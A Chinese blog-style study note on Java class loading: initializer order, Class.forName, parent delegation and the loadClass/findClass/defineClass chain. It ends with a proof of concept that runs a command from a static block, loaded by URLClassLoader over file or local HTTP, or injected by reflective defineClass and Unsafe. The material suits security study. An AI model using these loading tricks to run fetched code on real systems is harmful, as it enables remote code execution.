类的动态加载
首先我们来了解一下构造代码块和静态代码块:Java中静态代码块、构造代码块、构造函数、普通代码块 - YSOcean - 博客园
// 静态代码块
static {
System.out.println("静态代码块");
}
// 构造代码块
{
System.out.println("构造代码块");
}继上周我们重写了Person类:
package packet1;
import java.io.Serializable;
public class Person implements Serializable {
private String name;
private int age;
static int id;
public Person(){
System.out.println("无参构造方法");
}
static {
System.out.println("静态代码块");
}
{
System.out.println("构造代码块");
}
public Person(String name, int age){
this.name = name;
this.age = age;
System.out.println("有参代码块");
}
public static void staticFunction(){
System.out.println("静态方法");
}
}我们先写一个main来实例化Person看一下结果:
看到这个结果我们可以观察到两个信息:
- 实例化一个类后调用了静态代码块和构造代码块
- 执行的顺序是 静态代码块->构造代码块 -> 无参构造方法
接下来我们利用反射来尝试获取类看看会发生什么:
发现只调用了静态代码块
为什么?了解一下类是怎么加载到JVM中的:
一个类从被加载到虚拟机内存中开始,到卸载出内存,它的整个生命周期包括:加载(Loading)、验证(Verification)、准备(Preparation)、解析(Resolution)、初始化(Initialization)、使用(Using)和卸载(Unloading)7个阶段。
类加载过程,以及什么是双亲委派? - 掘金
用图来说就是这样:
重要的步骤就三步
- 加载
- 连接
- 初始化
只要初始化了就会执行静态代码块
如果实例化那么与对象相关的实例化和构造方法也会被调用
那么为什么forName会初始化类呢?我们可以看一下forName的构造函数:
其中之一的构造函数是这样
- 参数一
- 类名
- 参数二
- 是否初始化
- 参数三
- 使用的类加载器
所以我们如果这样就不会初始化类了:
将initialize这个参数设置成为false,代表不进行初始化。
运行结果:
发现只是对类进行了加载,并没有初始化。
我们这样使用forName:
如果跟进forName:
这一步我们就调用了一个参数的构造方法,但是在这个构造方法里面还是会调用四个参数的构造方法。可以看见默认的initialize默认是true,因此用一个参数的构造方法默认是会初始化的,我们继续往下看是如何初始化的。
Class.forName->Class.forName0->ClassLoader.loadClass
继续跟进发现到了Launcher.loadClass
这些检查机制过了之后就调用super.loadClass,即 ClassLoader.loadClass,发现还是回到了ClassLoader.loadClass
到了这一步里面有一个判断parent!=null,这里涉及到双亲委派
双亲委派:
在逻辑加载上是这样的:
我们可以尝试获取一下当前的应用类加载器是哪一个:
运行结果是ApplicationClassLoader。
当我们运行这个程序的时候要加载Person类,它并不会马上加载,而是会委托自己的逻辑父类ExtensionClassLoader去加载,ExtensionClassLoader会委托自己的逻辑父类BootstrapClassLoader去加载,如果这两个类加载器都无法加载,那么才会自己加载。
- BootstrapClassLoader(启动类加载器)是负责加载基础的String类、java.lang类等比较基础的类。
- ExtensionClassLoader就是加载扩展类。
- AppClassLoader应用类加载器,又称为系统类加载器,负责在JVM启动时,加载来自在命令java中的classpath或者java.class.path系统属性或者CLASSPATH操作系统属性所指定的JAR类包和类路径。
那么为什么要说逻辑父类去加载?
可以看见AppClassLoader和ExtClassLoader是继承于同一个类URLClassLoader,所以在类的关系上,他们是同级。但是在双亲委派的逻辑关系上他们却是子父类
接下来会调用ClassLoader.findClass->URLClassLoader.findClass
这里这行代码是获取类名
URLClassLoader.findClass->URLClassLoader.defineClass
到了definClass里面发现已经开始创建byte数组了,其实在defineClass里面就是完成了类的加载
加载完后出来就是:
判断是否resolve(解析) 类的流程:加载、解析、初始化
return的路径:ClassLoader->LauncherLoader->ClassLoader->Class
小结一下:
forName的整个类的继承关系是这样的:
ClassLoader->SecureClassLoader->URLClassLoader->AppClassLoader
->ExtClassLoader
调用顺序是这样的:
loadClass->findClass(重写的方法)->defineClass(字节码加载类)
安全问题
我们如果可以利用URLClassLoader,就可以通过把恶意代码写在静态代码块里面来加载从而执行命令。
我们首先编译一个恶意的Hello类:
import java.io.IOException;
public class Hello {
static {
try {
Runtime.getRuntime().exec("calc");
} catch (IOException e) {
e.printStackTrace();
}
}
}
再使用一个URLClassLoader来加载这个类:
package packet1;
import java.net.MalformedURLException;
import java.net.URL;
import java.net.URLClassLoader;
public class Test {
public static void main(String[] args) throws MalformedURLException, ClassNotFoundException, InstantiationException, IllegalAccessException {
URLClassLoader uc = new URLClassLoader(new URL[]{new URL("file:///D:\\JAVA\\IDEA\\IntelliJ IDEA 2021.3.3\\Project\\Test\\out\\production\\Test\\packet1\\")});
Class<?> hello = uc.loadClass("Hello");
hello.newInstance();
}
}
运行结果,成功弹出计算机。
但是我们这里是利用了file协议,file协议是本地协议。我们可以使用http协议
首先,我们在某个路径开启http服务:
然后修改Hello.java:
package packet1;
import java.net.MalformedURLException;
import java.net.URL;
import java.net.URLClassLoader;
public class Test {
public static void main(String[] args) throws MalformedURLException, ClassNotFoundException, InstantiationException, IllegalAccessException {
URLClassLoader uc = new URLClassLoader(new URL[]{new URL("http://127.0.0.1:9999/")});
Class<?> hello = uc.loadClass("Hello");
hello.newInstance();
}
}
同样可以触发计算器。
如果服务器不出网的话可以利用defineClass:
package packet1;
import java.io.IOException;
import java.lang.reflect.InvocationTargetException;
import java.lang.reflect.Method;
import java.nio.file.Files;
import java.nio.file.Paths;
public class Test {
public static void main(String[] args) throws IOException, IllegalAccessException, NoSuchMethodException, InvocationTargetException, InstantiationException {
Method method = ClassLoader.class.getDeclaredMethod("defineClass", String.class, byte[].class, int.class, int.class);
method.setAccessible(true);
byte[] code = Files.readAllBytes(Paths.get("D:\\JAVA\\IDEA\\IntelliJ IDEA 2021.3.3\\Project\\Test\\out\\production\\Test\\Hello.class"));
Object hello = method.invoke(ClassLoader.getSystemClassLoader(), "Hello", code, 0, code.length);
Class c = (Class)hello;
c.newInstance();
}
}还有另一个类可以调用definClass:
package packet1;
import sun.misc.Unsafe;
import java.io.IOException;
import java.lang.reflect.Field;
import java.lang.reflect.InvocationTargetException;
import java.lang.reflect.Method;
import java.nio.file.Files;
import java.nio.file.Paths;
public class Test {
public static void main(String[] args) throws IOException, IllegalAccessException, NoSuchMethodException, InvocationTargetException, InstantiationException, NoSuchFieldException {
Field u = Unsafe.class.getDeclaredField("theUnsafe");
u.setAccessible(true);
Unsafe c = (Unsafe)u.get(null);
byte[] code = Files.readAllBytes(Paths.get("D:\\JAVA\\IDEA\\IntelliJ IDEA 2021.3.3\\Project\\Test\\out\\production\\Test\\Hello.class"));
Class<?> test = c.defineClass("Hello", code, 0, code.length, ClassLoader.getSystemClassLoader(), null);
test.newInstance();
}
}
![[附源码]计算机毕业设计基于SpringBoot动漫电影网站](https://img-blog.csdnimg.cn/c55785c6294144c9bc164949c57a34e1.png)
